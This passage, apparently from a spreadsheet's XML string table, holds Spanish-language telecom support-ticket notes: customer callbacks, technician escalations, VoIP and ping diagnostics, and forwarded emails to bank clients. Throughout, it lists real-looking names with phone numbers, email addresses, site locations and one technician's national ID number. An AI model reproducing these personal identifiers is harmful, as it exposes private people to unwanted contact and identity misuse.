CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE INCIDENTE, SE NOTIFICAA JAIMEJ.HERNANDEZ VIA SKYPE | WIP
SE TERMINARA DE VALIDAR MEDIANTE SD</t>
  </si>
  <si>
    <t>F4574465</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARI DE LEON 42148353
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>TECNICO COMENTA QUE SE ENCONTRO PUERTO UNO DE FO DAÑADO Y SE CAMBIO A PUERTO 2 Y SE CONFIGURO EN TRONCAL, SERVICIO RESTABLECE
##SE DETIENE TIEMPO DE ESCALACION
##SE DA CODIGO DE CIERRE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>AETHRA NUEVAMENTE REGISTRANDO
SERV_PUER_90001910571\VOIP&gt;&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-SERVPUERTAS       ENABLE   +50278671300                     REGISTERED                              10.16.246.231:5060    2511      23 MAY 2022 16:22:11
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-SERVPUERTAS
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : ETH1 UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2511 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
NO CONNECTIONS
COMMAND EXECUTED
SERV_PUER_90001910571\VOIP&gt;&gt;</t>
  </si>
  <si>
    <t>SE ESCALÓ CON OSCAR CAYAX/TÉCNICO 58266635 INDICA QUE YA SE DIRIGE A CLIENTE, ESTÁ LLOVIENDO POR EL SECTOR, ESTIMA QUE ESTÉ POR AHÍ EN UNOS 45 MINUTOS A UNA HORA. ADICIONAL SE LLAMÓ/HABLÓ CON DANIEL LIMA/CLIENTE 55156797 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>SE CONTACTA CON MARI DE LEON 42148353 PARA VALIDAR EL ESTADO DEL SERVICIO, NOS CONFIRMA LLAMADAS ENTRANTES Y SALIENTES, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA UBICANDO EL EQUIPO CTC
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4574467</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE PR 22866349 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001645941 - 1001646948</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22866349 NO RESPONDE
-ID 1001669319</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE EL ID QUE NECESITABA REPORTAR ES 770600013 ( G106 )
-ID 1001669862</t>
  </si>
  <si>
    <t>F4574478</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO FERNANDO OVIEDO 89168800, CLIENTE YA POSEE NAVEGACIÓN DESDE SU FORTINET, CLIENTE TIENE FORTI DE CLARO, CLIENTE ACTUALMENT PASA DE MEDIA CONVERTER A FORTINET, CLIENTE SOLICITA PARA QUE SE LE LLAME PARA QUE LLENEN FORMULARIO Y QUE LE CONFIGURE RESTTRICCIONES EN FORTINET
CLIENTE EN LLAMADA CON TECICO, ENTERADO QUE DEBE DAR SEGUIMIENTO CON SU EJECUTIVO || CLIENTE AUTORIZA CIERRE DE TICKET
1001734520
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 89168800
NÚMERO: 89168800
DURACIÓN: 0:09:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 89168800
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 23/05/2022 16:04:36</t>
  </si>
  <si>
    <t>F4574483</t>
  </si>
  <si>
    <t>SE LE LLAMA A MARI DIAZ 30196810 ID: 1001659666
SE DEJA EN CONFERENCIA CON DARWIN ESPAÑA PERA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4574488</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZULLY CORRALES: +506-70232483 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001050061
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR GERARDO INDICA QUE ESTAN A LA ESPERAN QUE LES ENVIEN OTRO NUMERO DE CONTACTO QUE CUANDO LO TENGAN NO LO ESTARAN COMPARTIENDO PARA PROGRAMAR LA VISITA **
ID 2001215337
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZULLY CORRALES: +506-70232483 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001214950
**</t>
  </si>
  <si>
    <t>TIEMPO ACUMULADO
TABLA DE ESCALAMIENTO COSTA RICA				
	WO OPEN                                			6:07:00
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	8:07:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	9:07:00
3/4	GILBERTO FERNANDEZ	7002-9441	5 HORAS	11:07:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	12:07:00</t>
  </si>
  <si>
    <t>TECNICO DAVID NAVARRO INDICA QUE MARTES SE PRESENTARON A SITIO Y ENCONTRARON  IDU DAÑADA,, PERSONAL TECNICO REALIZA CAMBIO
ENCUENTRAN UNA CONFIGURACION ERRONEA QUE CORRIGEN
ACTUALMENTE CLIENTE CUENTA CON SERVICIO PRINCIPAL ACTIVO TIEMPOS ALTOS EN RESPUETA A PING EN WAN DE SERVICIO REDUNDANTE
SE PIERDE LA COMUNICACION CON TECNICO. SE LLAMARA NUEVAMENTE SE ENCONTRABA MANEJANDO
2001270611-19</t>
  </si>
  <si>
    <t>EN GESTION CON CLIENTE CCR Y TECNICO PARA VALIDAR SERVICIO.
SERVICIO DE INTERNET ACTIVO ESTABLE CLIENTE INDICA QUE EL SERVICIO SE ENCUENTRA ESTABLE Y QUE EL SERVICIO WIRELESS QUE EL CLEINTE TIENE EN INSTALACIONES NO ESTA CONECTADO DIRECTO A ROUTER HUAWEI , YA QUE EN PRUEBAS DE DESCONEXION EL SERVICIO WIRELES DEL CLIENTE SE ENCONTRABA ACTIVO AL DESCONECTAR EL RADWIN CLARO.
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=84 TTL=50 TIME=100 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=85 TTL=50 TIME=110 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=86 TTL=50 TIME=188 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=87 TTL=50 TIME=467 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=88 TTL=50 TIME=359 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=89 TTL=50 TIME=159 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=90 TTL=50 TIME=117 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=91 TTL=50 TIME=286 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=92 TTL=50 TIME=157 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=93 TTL=50 TIME=313 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=94 TTL=50 TIME=291 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=95 TTL=50 TIME=164 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=96 TTL=50 TIME=87 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=97 TTL=50 TIME=148 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=98 TTL=50 TIME=103 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=99 TTL=50 TIME=109 MS
    REPLY FROM 1.1.1.1: BYTES=1500 SEQUENCE=100 TTL=50 TIME=138 MS
  --- 1.1.1.1 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 72/118/681 MS</t>
  </si>
  <si>
    <t>SE LLAMA AL PR SULI CORRALES COMO LO INDICA CRONO ANTERIOR  AL +506 70232483 ID 1001850791 / 1001851551 COMENTA QUE YA TIENE UN PROCESO POR REALIZAR CON EL EQUIPO QUE LE OTORGARON EN LA LLAMADA ANTERIOR PERO NO LO PUEDE REALIZAR YA QUE TIENE QUE PASAR A OTRO EDIFICIO Y TIENE BLOQUEADO EL PASO, INTENTA NUEVAMENTE EN LINEA GESTIONARLO Y PIDE TIEMPO EN ESPERA MIENTRAS SE LLAMA AL 8126 CON LA GESTORA YENSI.CALGUA ID 1001853779 SE LE BRINDA LA INFORMACIÓN Y SE DEJA CON CL EN LINEA</t>
  </si>
  <si>
    <t>SE LLAMO A CONTACTO QUIEN RESPONDE SOLICITA LLAMADA EN 10 MINUTOS PARA REALIZAR LAS PRUEBAS--
SULI CORRALES   +506 70232483</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO CASTRO / TEL: 8355 1541 NO RESPONDE, SE INTENTARA LUEGO **
ID 100151784
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANKLIN NIETO 83551541  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001765966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO CASTRO 83551541 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001764781</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO CASTRO / TEL: 8355 1541 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001726655
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN NIETO / TEL: 8491 4532 CONTESTA LLAMADA PERO CORTA LA LLAMADA SE INTENTARA
 LUEGO **
ID 1001725858
**</t>
  </si>
  <si>
    <t>A ESPERA DE CONFIRMACION DE ACCSEOS POR PARTE DE TECNICOS</t>
  </si>
  <si>
    <t>CLIENTE NO SE ENCUENTRA EN SITIO SE LLAMARA NUEVAMENTE EN 25 MINUTOS  A TECNICO</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO COSTA RICA				
	WO OPEN                                			11:10:00
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	13:10:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	14:10:00
3/4	GILBERTO FERNANDEZ	7002-9441	5 HORAS	16:10:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	17:10:00</t>
  </si>
  <si>
    <t>F4574494</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 23 DE MAYO DE 2022 11:50
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; MONITOREOBDR@CYBERSEG.COM &lt;MONITOREOBDR@CYBERSEG.COM&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL SITIO: CC_BANRURAL_GT_AGENCIA_079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4494
ID:8901154T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0791
UBICADO EN: C.C. MEGA PLAZA ESTANZUELA LOCAL 22 DEL MODULO 2 KM KM 140 RUTA AL ATLANTICO, ESTANZUELA ZACAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>F4574513</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS ROBLES 58794781 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001721540</t>
  </si>
  <si>
    <t>F4574524</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA AUN POR PARTE DE CLIENTE--</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE---
RE: ENLACE DE INTERNET PRIMARIO Y SECUNDARIO | BGP CLARO</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 17:35
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; WILMER F. MURILLO / BANCO DEL PAIS &lt;WILMERM@BANPAIS.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
CC: GRUPO MONITOREO Y DESPACHO / BANPAIS &lt;MONITOREO_DESPACHO@BANPAIS.HN&gt;; GRUPO DE COMUNICACIONES BP / BANPAIS &lt;COMUNICACIONES@BANPAIS.HN&gt;; GRUPO OPERACIONES DATA CENTER / BANPAIS &lt;DATACENTER@BANPAIS.HN&gt;
ASUNTO: RE: ENLACE DE INTERNET PRIMARIO Y SECUNDARIO | BGP CLARO
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4574531</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO RETOMAN, SE INTENTARA
LUEGO **
ID 1001670430
**</t>
  </si>
  <si>
    <t>F4574534</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVETTE AVALOS-63047356  || SE TIENE EN LINEA ""
1001652213
COLA:
NOMBRE: A: 0050363047356
NÚMERO: 0050363047356
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050363047356
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/05/2022 12:02:46</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL PROBLEMA QUE REPORTA ES QUE NO POSEE LLAMADAS SALIENTES DESDE HACE DOS MESES Y COMENTA QUE HAN ESTADO PAGANDO LA FACTURA EN EL TIEMPO INDICADO- + REALIZZZA UN PRUEBA DE LLAMDA SALIENTE Y EL MENSAJE INDICA "QUE DEBE PAGAR LA FACTURA"</t>
  </si>
  <si>
    <t>F4574557</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORELLANA AL 44990369 NO RESPONDE SE INTENTARA LUEGO **
ID 1001675437
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIA VELASCOS AL 59986437  INIDCA QUE NO ESTA EN LA AGENCIA Y QUE NO LE HAN
REPOTADO NADA **
ID 1001676049
**</t>
  </si>
  <si>
    <t>F4574558</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MEJIA 32806177 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001045276</t>
  </si>
  <si>
    <t>F4574563</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELISABETH BENITEZ AL 78508520 INDICA QUE YA NO ESTA EN SITIO Y QUE REGRESA HASTA EL MIERCOLES SOLICITA QUE SE LLAME EL MIERCOLES DESDE LAS 7:00 AM **
ID 1001677289
**</t>
  </si>
  <si>
    <t>F4574569</t>
  </si>
  <si>
    <t>##CLIENTE INDICA QUE SE PUEDE REALIZAR LA VISITA PARA EL DIA DE MAÑANA A LAS 7 AM  SE ADJUNTA CAPTURA DE MENSAJE DE WHATSAPP CON CLIENTE ###
EL TECNICO CONSEGUIRA EL REPUESTO PROACTIVAMENTE
SE MANEJARA EN PC YA QUE EL CLIENTE INDICA VISITA PARA MAÑANA
LLAMADA CON TECNICO
1001845999
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:14:05
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 24/05/2022 10:10:21</t>
  </si>
  <si>
    <t>F4574571</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 71187100  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001710092</t>
  </si>
  <si>
    <t>F4574576</t>
  </si>
  <si>
    <t>SE LE LLAMA A  HUGO VELEZ 54255578 ID: 1001697018, COMENTA QUE YA REALIZARON PRUEBA, CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A RAMOS.MARLON VIA SKYPE  WIP</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HUGO VELEZ AL 54255578 CLIENTE INIDCA QUE AUN TIENE INCONVENIENTE SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001680329
**</t>
  </si>
  <si>
    <t xml:space="preserve"> **SE LLAMA A CLIENTE HUGO VELEZ 54255578 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001698042
**</t>
  </si>
  <si>
    <t>F4574596</t>
  </si>
  <si>
    <t>FALLA GENERAL F4574652/FALLA MASIVA F4574609:
PERDIDA DE PAQUETES || ASR920 CERRO EL PARAISO/CORTE DE FIBRA ÓPTICA EN SECTOR
SEGUIMIENTO DE LA FALLA:
PERSONAL DE CONTRATA UFINET HIZO FUSIONES CON LA FO AYER, SIN EMBARGO LOS ENLACES SIGUEN FUERA.
SEGUIMIENTO CON PLEX REGIÓN. AVANCES DESPUÉS DE LAS 13:00 HORAS.</t>
  </si>
  <si>
    <t>F4574618</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA EN EFECTO NO SE NOTIFICO POR ERROR, ADICIONAL NO SE VALIDA CON QUIEN REALIZARON LAS PRUEBAS O ALGÚN DATOS U HORARIO PARA EL CONTACTO Y BRINDAR SEGUIMIENTO CON EL CLIENTE, POR LO QUE SE LLAMA A JEFFERSON ARCE AL 22437253 ID 1001940117 SE LE BRINDA LA INFORMACIÓN SEGÚN CRONOLOGÍA  Y COMENTA QUE SI LO VE OPERATIVO PERO SE FUE EL AUDIO Y SE LIBERA POR FALTA DE COMUNICACIÓN. SE VUELVE A LLAMAR  AL 22437253 ID 1001941726 Y ATIENDE  NOE SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE VALIDAR Y NOTIFICA QUE SE PROCEDA CON EL CIERRE Y SI EXISTIERA ALGUNA REINCIDENCIA LO REPORTARA, PROCEDER EL CIERRE DEL TICKET CON LA SD  SE NOTIFICA AL GESTOR JOSE.ESTRADA VIA SKYPE</t>
  </si>
  <si>
    <t>SE VALIDA QUE SE REPORTO EL DÍA DE AYER LA REINCIDENCIA 23/05/2022 23:44:38 NO HAY CONTACTO O SEGUIMIENTO POR PARTE DEL CNOC SE MUEVE A WIP PARA QUE BRINDEN EL SEGUIMIENTO, EN CASO DE MOVERLO A  PC  INDICAR QUE ES LO PENDIENTE POR FAVOR.  SE NOTIFICA AL GESTOR GERSON.AJPACAJA VIA SKYPE</t>
  </si>
  <si>
    <t>-* SE TIENE CORREO DE CLIENTE REPORTANDO EL SERVICIO NUEVAMENTE CAIDO, SE NOTIFICA A CNOC Y SE RESPONDE CORREO A CLIENTE -*
-*</t>
  </si>
  <si>
    <t>F4574628</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN RAMÍREZ 47601229 SOLICITA QUE SE LE LLAME EN 30 MIN PARA CONFIRMAR **
ID 1001804405
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN RAMÍREZ 47601229 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO  **
ID 1001816420
**</t>
  </si>
  <si>
    <t>F4574632</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADA / O DE LUGAR AL 23618026, 58448999 ANDREA AREVALO SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR**
ID 1001688136 - 1001688424
**</t>
  </si>
  <si>
    <t>F4574635</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO  AL 66378363 CONTESTA EL SEÑOR DAGOBERTO GONZALEZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001739483
**</t>
  </si>
  <si>
    <t>F4574643</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
LUN 23/05/2022 1:15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4643¿¿
ID: 8900770T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0458
UBICADO EN:
PLAZA LAS CASCADAS TECULUTAN KM.121.5 CARR A ATLANTICO SAN JOSE TECULUTAN ZACAPA¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS. ¿</t>
  </si>
  <si>
    <t>F4574647</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HECTOR REYES 35835981 MENCIONA YA TODO ESTA FUNCIONANDO CORRECTAMENTE
SE LE MENCIONA A CLIENTE EL DIAGNOSTICO REALIZADO
-ID 1001734466</t>
  </si>
  <si>
    <t>F4574654</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NIXA CHANG 55195468 MENCIONA QUE EL SERVICIO ES MUY INESTABLE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001736784</t>
  </si>
  <si>
    <t>EN PRUEBAS CON CLIETNE SRTA. NIXA CHANG 55195468 INFORMA QUE EL CTC UNION NO ESTA CONECTADO AL UPS, POR TAL MOTIVO ESTE EQUIPO SE ESTA APAGANDO O SE QUEDE INHIBIDO, SE SOLICITA CONECTAR AL UPS, COMENTO QUE ESTA DENTRO DEL RACK Y NO LOGRO CONECTARLO AL UPS, SOLICITARA APOYO DEL ENCARGADO DE IT, SOLICITA LLAMAR MAÑANA EN EL TRANSCURSO DE LA MAÑANA PARA VALIDAR QUE DESPUES DE CONECTAR AL UPS QUEDE ESTABLE.</t>
  </si>
  <si>
    <t>F4574659</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 14:27
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;
CC: JESSICA FELICITA MARROQUIN FERRERA &lt;JFMARROQ@BANCOAGRICOLA.COM.SV&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; OSCAR ARMANDO CAMINOS CHAVEZ &lt;OCAMINOS@BANCOAGRICOLA.COM.SV&gt;; GERARDO BENJAMIN TOBAR HERNANDEZ &lt;GBTOBAR@BANCOAGRICOLA.COM.SV&gt;; GESTION INCIDENTES TI BANCO AGRICOLA &lt;GEINTIBA@BANCOAGRICOLA.COM.SV&gt;; JOSE MANUEL GRANDE VIDES &lt;JMGRANDE@BANCOAGRICOLA.COM.SV&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; ATMS &lt;ATMS@BANCOLOMBIA.COM.CO&gt;
ASUNTO: RE: TICKET#20488060 ¿ PERDIDA DE COMUNICACIÓN CON EL NODO ANAMOROS-CL-IP2221005
BUENAS TARDES ESTIMADOS(A)
COMO PARTE DEL SEGUIMIENTO AL CASO PERDIDA DE COMUNICACIÓN CON EL NODO ANAMOROS-CL-IP2221005 SE VALIDA ENLACE OPERATIVO ALCANZABLE A NIVEL DE PING (FIGURA 1). SE OBSERVA LA INTERFAZ LAN EN EL CPE DOWN (FIGURA 2). SALUDOS CORDIALES.
FIGURA 1. ENLACE ALCANZABLE A NIVEL DE PING.
FIGURA 2. INTERFAZ LAN DOWN EN CPE
FIGURA 3. NO SE TIENEN EQUIPOS ASOCIADOS</t>
  </si>
  <si>
    <t>F4574660</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS AVILES 79907304 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE POSEE UN EQUIPO ASMI EL CUAL INDICA QUE TODOS LOS INDICADORES DE ALARMA ESTAN INTERMITENTE DE ROJO A VERDE, UNICAMENTE PWR SE QUEDA FIJO EN VERDE CLIENTE INDICA QUE YA REINICIO EL EQUIPO PERO AUN PERSISTE EL PROBLEMA, SOLICITA QUE SE ENVIE PERSONAL TECNICO A VERIFICAR EL EQUIPO PARA VALIDAR QUE NO ESTUVIERA DAÑADO, SE PROCEDE A COORDIANR PERSONA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4574661</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FLORES 74308384 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001739047</t>
  </si>
  <si>
    <t>F4574662</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA ENTERADO DEL INCONVENIENTE CON EQUIPO INTERNO QUE ESTA CREANDO UNA IP DUPLICADA INDICA SIEMPRE ESTE INCONVENIENTE SE ESTARA VIENDO EL DIA DE MAÑANA EN CONJUNTO CON PERSONAL TECNICO DE CLARO YA QUE NECESITAN VALIDAR DESDE DONDE SE TIENE INCONVENIENTE-- ADICIONAL A ELLO CLIENTE MENCIONA QUE NO TIENEN ACCESO HACIA CAMBOTE QUE POR ELLO SE ESTARA MOVILIZANDO COMENTA QUE SI PERSONAL TECNICO LLEGA ANTES DE LAS 8:00 HORAS PUEDEN SOLICITAR ENTRAR YA QUE AVISARA A LAS PERSONAS EN SITIO-
SECTOR #6 CAMBOTE ZONA 11 HUEHUETENANGO HUEHUETENANGO 15.296251 -91.49049
KPOITAN@PROMASA.HN</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA VISITA MAÑANA MARTES 8 AM || PENDIENTE RESPUESTA
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADO CLIENTE.
EN SEGUIMIENTO AL SERVICIO ID: 581000009T ||  PROCESADORA DE METALES GUATEMALA, S.A. || SECTOR #6 CAMBOTE ZONA 11 HUEHUETENANGO HUEHUETENANGO ||
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR EL MEDIO Y EQUIPOS EN SUCURSAL, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO QUE ATENDERÁ VISITA EL DÍA DE MAÑANA MARTES 24/05/22 A PARTIR DE LAS 8:00 AM.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
WILSON DONALDO, CANO PINTO IBM: 530048 DPI: 2604026211306
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4574665</t>
  </si>
  <si>
    <t>JUAN PABLO MORALES BARRONDO
LUN 23/05/2022 1:40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4665¿¿
ID: 8900636T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0336
UBICADO EN:
AGE336 - CABAÑAS EDIF. MUNICIPAL DE CABAÑAS ZACAPA¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS. ¿
¿</t>
  </si>
  <si>
    <t>F4574671</t>
  </si>
  <si>
